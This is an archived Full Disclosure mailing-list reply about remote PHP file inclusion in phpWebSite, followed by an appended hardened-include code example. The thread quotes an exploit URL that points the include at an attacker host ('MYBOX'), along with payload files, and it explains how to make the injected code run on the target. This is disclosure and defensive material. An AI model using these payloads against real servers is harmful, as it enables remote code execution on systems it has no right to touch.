Full Disclosure mailing list archives
Re: PHP source injection in phpWebSite
From: avart () gmx de (avart () gmx de)
Date: Mon, 23 Sep 2002 19:04:41 +0200 (MEST)
Hi Tim!
> -------- modsecurity.php --------
> <?php
> global $inc_prefix;
> if(!$inc_prefix) {
> ...
> }
> ...
> include_once($inc_prefix."htmlheader.php");
> ?>
> ----------------------------------
>
> If someone requests a URL like
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, the htmlheader.php
> file from MYBOX would be included, and the attacker would be able to
> include any code he wants.
>
> Examples
> ========
>
> http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
>
> --- htmlheader.php ---
> <? passthru("/bin/ls") ?>
> ----------------------
>
> Output: dir listing of the current directory
That's not completely right. You have to put an "echo" (with the right
quoting around the evil code), because the evil webserver (MYBOX) usually
executes files ending with .php (if MYBOX doesn't do it, the example is ok).

So usually you want to put the following line in htmlheader.php on the
evil server (MYBOX):

<?php echo "<?php phpinfo();?>" ?>

Now, if you request MYBOX/htmlheader.php the following line would be
included (and executed):

<?php phpinfo();?>

In the example of Tim, the /bin/ls output from the evil machine (MYBOX)
would be included, because htmlheader (usually) gets executed, because of
the .php suffix.

It's important to point to it; I got a lot of mails from users that didn't
get how to include $evil_code when $evil_machine (aka MYBOX) interprets
files with the .php suffix.

Just my 0,2 EUR-Cents

Regards,
Avart
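The include pattern discussed in this thread, placed beside a hardened version, as an added example that is not code from phpWebSite or from either post; INCLUDE_BASE, its path and the allow-list of file names are assumptions.

```php
<?php
// Added example, not code from phpWebSite or from either post in this thread.
// It contrasts the include pattern quoted above with a hardened version.
// Assumed: trusted include files live under INCLUDE_BASE (a made-up path).

// --- Vulnerable pattern (as quoted from Tim's advisory) ---
//   global $inc_prefix;
//   include_once($inc_prefix . "htmlheader.php");
// $inc_prefix is never assigned from trusted code, so with register_globals
// on, ?inc_prefix=http://MYBOX/ fills it from the query string and PHP
// fetches and executes http://MYBOX/htmlheader.php. As Avart notes, MYBOX
// runs that file itself, so what SERVER receives is the script's output.

// --- Hardened pattern ---
const INCLUDE_BASE = '/var/www/phpwebsite/lib';   // assumed location

function safe_include_path(string $name): string
{
    // 1. Fixed allow-list of file names; the directory never comes from input.
    $allowed = ['htmlheader.php', 'htmlfooter.php'];
    if (!in_array($name, $allowed, true)) {
        throw new RuntimeException("refusing to include '$name'");
    }
    // 2. realpath() resolves symlinks and '..', and returns false for
    //    http://, ftp://, php:// and other stream wrappers.
    $path = realpath(INCLUDE_BASE . DIRECTORY_SEPARATOR . $name);
    // 3. The resolved file must still sit inside INCLUDE_BASE.
    if ($path === false || strncmp($path, INCLUDE_BASE . DIRECTORY_SEPARATOR,
                                   strlen(INCLUDE_BASE) + 1) !== 0) {
        throw new RuntimeException("include path escapes " . INCLUDE_BASE);
    }
    return $path;
}

// Defence in depth in php.ini (these are server-wide settings):
//   register_globals  = Off   (removed entirely in PHP 5.4)
//   allow_url_include = Off   (default since it was introduced in PHP 5.2)
//   allow_url_fopen   = Off   if nothing else needs remote streams
include_once safe_include_path('htmlheader.php');
```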